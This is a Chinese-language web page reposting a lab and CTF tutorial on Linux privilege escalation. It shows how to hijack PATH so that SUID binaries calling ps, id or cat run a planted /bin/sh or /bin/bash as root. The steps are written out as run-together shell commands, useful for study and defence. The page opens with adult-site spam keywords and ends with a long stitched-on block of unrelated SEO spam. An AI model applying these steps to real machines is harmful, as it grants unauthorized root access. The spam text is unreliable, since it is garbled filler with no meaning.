国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

黑客的Linux神技能:使用環境變量進行提權

系統 Linux
在這篇文章中,我將會為大家介紹一些使用環境變量進行Linux提權的方法,包括在CTF challenges中使用到一些的技術。話不多說,讓我們進入正題!

黑客的Linux神技能:使用環境變量進行提權

在這篇文章中,我將會為大家介紹一些使用環境變量進行Linux提權的方法,包括在CTF challenges中使用到一些的技術。話不多說,讓我們進入正題!

介紹

PATH是Linux和類Unix操作系統中的環境變量,它指定存儲可執行程序的所有bin和sbin目錄。當用戶在終端上執行任何命令時,它會通過PATH變量來響應用戶執行的命令,并向shell發送請求以搜索可執行文件。超級用戶通常還具有/sbin和/usr/sbin條目,以便于系統管理命令的執行。

使用echo命令顯示當前PATH環境變量: 

  1. echo $PATH  
  2. /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games 

如果你在PATH變量中看到‘.’,則意味著登錄用戶可以從當前目錄執行二進制文件/腳本,這對于攻擊者而言也是一個提權的絕好機會。這里之所以沒有指定程序的完整路徑,往往是因為編寫程序時的疏忽造成的。

方法1

Ubuntu LAB SET_UP

當前,我們位于/home/raj目錄,我們將在其中創建一個名為/script的新目錄。在script目錄下,我們將編寫一個小型的c程序來調用系統二進制文件的函數。

  1. pwdmkdir scriptcd /scriptnano demo.c 

 

正如你在demo.c文件中看到的,我們正在調用ps命令。

 

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權限。 

  1. lsgcc demo.c -o shellchmod u+s shellls -la shell 

 

受害者VM機器

假設我們已經成功滲透目標,并進入提權階段。我們通過ssh成功登錄到了受害者的機器。然后使用Find命令,搜索具有SUID或4000權限的文件。 

  1. find / -perm -u=s -type f 2>/dev/null 

通過上述命令,攻擊者可以枚舉出目標系統上所有的可執行文件,這里可以看到/home/raj/script/shell具有SUID權限。

 

進入到/home/raj/script目錄,可以看到該目錄下有一個可執行的“shell”文件,我們運行這個文件。 

  1. /home/raj/script 

 

Echo命令 

  1. cd /tmpecho “/bin/sh” > pschmod 777 psecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shellwhoami 

 

Copy命令 

  1. cd /home/raj/script/cp /bin/sh /tmp/psecho $PATHexport PATH=/tmp:$PATH./shellwhoami 

 

Symlink命令 

  1. ln -s /bin/sh psexport PATH=.:$PATH./shellidwhoami 

注意:符號鏈接也叫軟鏈接,如果目錄具有完全權限,則它將成功運行。在Ubuntu中symlink情況下,我們已經賦予了/script目錄777的權限。

因此,攻擊者可以操縱環境變量PATH來進行提權,并獲得root訪問權限。

 

方法2

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環境,現在在腳本目錄中,我們將編寫一個小型的c程序來調用系統二進制文件的函數。 

  1. pwdmkdir scriptcd /scriptnano demo.c 

正如你在demo.c文件中看到的,我們正在調用id命令。

 

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權限。 

  1. lsgcc demo.c -o shell2chmod u+s shell2ls -la shell2 

 

受害者VM機器

同樣,假設我們已經成功滲透目標,并進入提權階段。我們通過ssh成功登錄到了受害者的機器。然后使用Find命令,搜索具有SUID或4000權限的文件。在這里,我們可以看到/home/raj/script/shell2具有SUID權限。 

  1. find / -perm -u=s -type f 2>/dev/null 

進入到/home/raj/script目錄,可以看到該目錄下有一個可執行的“shell2”文件,我們運行這個文件。 

  1. cd /home/raj/scriptls./shell2 

 

Echo命令 

  1. cd /tmpecho “/bin/sh” > idchmod 777 idecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shell2whoami 

 

方法3

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環境。正如你在demo.c文件中看到的,我們正在調用cat命令從etc/passwd文件中讀取內容。

 

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權限。 

  1. lsgcc demo.c -o rajchmod u+s rajls -la raj 

 

受害者VM機器

同樣,假設我們已經成功滲透目標,并進入提權階段,通過執行以下命令查看sudo用戶列表。 

  1. find / -perm -u=s -type f 2>/dev/null 

在這里,我們可以看到/home/raj/script/raj具有SUID權限,進入到home/raj/script/目錄,可以看到該目錄下有一個可執行的“raj”文件。所以當我們運行這個文件時,它會把etc/passwd文件作為輸出結果。 

  1. cd /home/raj/script/ls./raj 

 

Nano**編輯器** 

  1. cd /tmpnano cat 

現在,當終端打開時輸入/bin/bash并保存。

 

 

  1. chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./rajwhoami 

 

方法4

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環境。正如你在demo.c文件中看到的,我們正在調用cat命令讀取/home/raj中的msg.txt中的內容,但/home/raj中并沒有這樣的文件。

 

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權限。 

  1. lsgcc demo.c -o ignitechmod u+s ignitels -la ignite 

 

受害者VM機器

同樣,假設我們已經成功滲透目標,并進入提權階段,通過執行以下命令查看sudo用戶列表 

  1. find / -perm -u=s -type f 2>/dev/null 

在這里,我們可以看到/home/raj/script/ignite具有SUID權限,進入到/home/raj/script目錄,可以看到該目錄下有一個可執行的“ignite”文件。所以當我們運行這個文件時,它會報錯“cat: /home/raj/msg.txt”文件或目錄不存在。 

  1. cd /home/raj/scriptls./ignite 

 

Vi編輯器 

  1. cd /tmpvi cat 

現在,當終端打開時輸入/bin/bash并保存。

 

 

  1. chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./ignitewhoami 

 

原文鏈接:http://www.freebuf.com/articles/system/173903.html 

責任編輯:龐桂玉 來源: 馬哥Linux運維
相關推薦

2021-02-15 15:52:27

Linux環境變量命令

2023-11-01 13:40:25

GolangGo

2021-06-18 08:43:20

環境變量Linux

2009-10-21 12:58:18

2021-11-29 10:25:16

Linux環境變量命令

2019-09-09 09:02:04

Linux腳本語言文本編輯器

2019-05-30 10:20:10

Linux環境變量命令

2021-01-06 08:04:30

Linux方式提權

2009-06-16 15:57:53

Java環境變量

2010-03-01 18:01:45

Python環境變量

2011-08-22 15:06:19

linux環境變量

2018-01-03 12:49:48

Linux命令sudo

2020-11-23 15:21:12

Linux環境變量

2010-06-07 11:33:11

Linux查看環境變量

2009-11-27 14:08:18

2020-12-28 10:50:09

Linux環境變量命令

2011-06-14 09:21:55

Linux Qt 環境變量

2009-06-15 16:28:30

JAVA環境變量

2011-05-31 13:41:50

Android 環境變量

2024-07-31 08:46:10

點贊
收藏

51CTO技術棧公眾號

妞干网在线免费视频| 澳门成人av网| 久久99国产精品久久99| 国产精品视频免费在线观看| 中文幕av一区二区三区佐山爱| 欧美日韩专区在线| 亚洲精品男人| 17c精品麻豆一区二区免费| 日韩精品视频在线观看视频| 久久亚洲不卡| 99久久自偷自偷国产精品不卡| 亚洲国产精品第一区二区| 欧美日韩美女在线| 亚洲电影在线看| 国产小视频免费在线网址| 亚洲精品视频一区二区| 日本在线观看a| 91欧美一区二区| 国产欧美久久久久| 久久精品国产亚洲高清剧情介绍| 久热这里只精品99re8久| 亚洲精品1234| 日本在线播放不卡| 日韩中文字幕不卡| 亚洲乱码一区二区三区三上悠亚| 天堂久久久久va久久久久| 日韩久久在线| 美洲天堂一区二卡三卡四卡视频| 先锋影音一区二区三区| 日韩国产高清在线| 大桥未久一区二区| a亚洲天堂av| 国产男女激情视频| 国产亚洲视频系列| 激情丁香在线| 亚洲成人动漫精品| 毛片免费在线观看| 91精品国产高清一区二区三区| 久久不射热爱视频精品| 色又黄又爽网站www久久| 欧美一区二区少妇| 欧美亚洲一区三区| 污污在线观看| 一区二区三区视频在线| **国产精品| 97在线观看视频| 国产精选一区| 国产一区深夜福利| 99国产精品99久久久久久粉嫩| 视频一区二区在线| 成人午夜大片免费观看| 日韩av播放器| 亚洲成人自拍一区| caoporn免费在线视频| 日韩欧美一区在线| 91麻豆精品| 成人久久久久久| 免费在线播放第一区高清av| 国产精品videossex国产高清| 91精品秘密在线观看| 亚洲性图自拍| 亚洲综合自拍一区| 久久久99精品久久| 秋霞一区二区| 欧美激情第一页在线观看| 国内久久视频| 四虎精品欧美一区二区免费| 麻豆国产欧美日韩综合精品二区| 国产欧亚日韩视频| 亚洲国产精品久久久久婷婷884| 污视频免费在线观看网站| 日韩视频一区二区三区 | 伊人色综合久久天天人手人婷| 欧美xxxx黑人又粗又长密月| 性网站在线免费观看| 欧美在线一区二区三区| 精品美女调教视频| 亚洲精品永久免费| 郴州新闻综合频道在线直播| 在线观看国产日韩| 成人免费看片| 深夜福利亚洲导航| 欧美一区=区三区| 91亚洲精品视频| 中文字幕精品一区二区精品绿巨人 | 国产高清在线一区| 日韩精品免费一区二区在线观看| 国产亚洲欧美一区二区三区| 在线日韩欧美| 国内一区在线| 黄色成人免费观看| 久久精品免费在线观看| 超碰caoporn久久| 91丨国产丨九色丨pron| 老司机aⅴ毛片免费观看| 国产精品国产亚洲精品看不卡15| 国产精品免费人成网站| 日韩一级特黄毛片| 欧美日韩国产精品自在自线| 91丨九色丨国产在线| 男人的天堂狠狠干| 欧美日韩国产综合视频在线观看中文 | 超碰超碰人人人人精品| 久久av喷吹av高潮av| 亚洲免费av在线| 欧美成年网站| 蜜桃麻豆www久久国产精品| 色综合久久88色综合天天免费| 免费毛片在线| 亚洲免费av网址| 97色婷婷成人综合在线观看| 亚洲国产成人精品久久| 欧美日韩午夜| 日韩子在线观看| 欧美凹凸一区二区三区视频| 日韩精品在线免费| 亚洲在线播放| 日韩电影在线免费| 久久国产生活片100| 久久综合综合久久综合| aa在线视频| 色欧美片视频在线观看在线视频| 亚洲精品视频一二三区| 成年在线播放小视频| 91精品网站| 成人女保姆的销魂服务| 欧美色精品在线视频| 国产精品羞羞答答xxdd| 欧美激情综合| 欧美久久香蕉| av免费看大片| 国内精品在线视频| 男人操女人免费软件| 噜噜噜噜噜久久久久久91| 69久久夜色精品国产69乱青草| 亚洲欧美成人在线| 欧美午夜精品电影| 亚洲乱码久久| 精品大片一区二区| 伊人久久大香线蕉av超碰| 一女被多男玩喷潮视频| 91精品国产综合久久香蕉最新版| 欧美高清激情视频| 久久国产精品久久国产精品| 国产日韩精品在线| 国产精品视频永久免费播放| 欧美一区二区三区免费视频| 欧美高清视频一二三区 | 亚洲乱码中文字幕综合| 激情五月播播久久久精品| 国产精一品亚洲二区在线视频| 一二区成人影院电影网| 97香蕉久久| 91网站免费观看| 欧美精品久久久久久久免费观看 | 国产精品伦理久久久久久| 亚欧成人精品| 亚洲伊人观看| 青青久久av| 最新亚洲激情| 久久精品日产第一区二区三区高清版| 色婷婷狠狠综合| 欧美插天视频在线播放| 奇米成人av国产一区二区三区| 久久精品一区中文字幕| 日韩欧美视频在线| 欧美午夜不卡视频| 精品国产91久久久久久老师| 国内精品国产三级国产99| 亚洲国产高清在线| 国产目拍亚洲精品99久久精品| 久久精品在这里| 亚洲免费在线视频| 欧美一级免费大片| 91欧美激情另类亚洲| 欧美一级视频免费看| 日韩电影毛片| 日韩在线观看免费av| 疯狂做受xxxx欧美肥白少妇| www国产成人免费观看视频 深夜成人网| 欧美国产亚洲另类动漫| 亚洲大胆美女视频| 欧美在线视频网站| 91成人伦理在线电影| 成人免费淫片免费观看| 黄色国产在线| 97超碰在线免费| 亚洲电影网站| 日韩在线观看高清| 欧美精品videosex极品1| 国产精品亚发布| 亚洲一区三区| 三级ai视频| 男人皇宫亚洲男人2020| 国产极品在线观看| 欧美韩日精品| 爱啪啪综合导航| 最新av番号| 国产一级成人av| 成人av免费在线播放|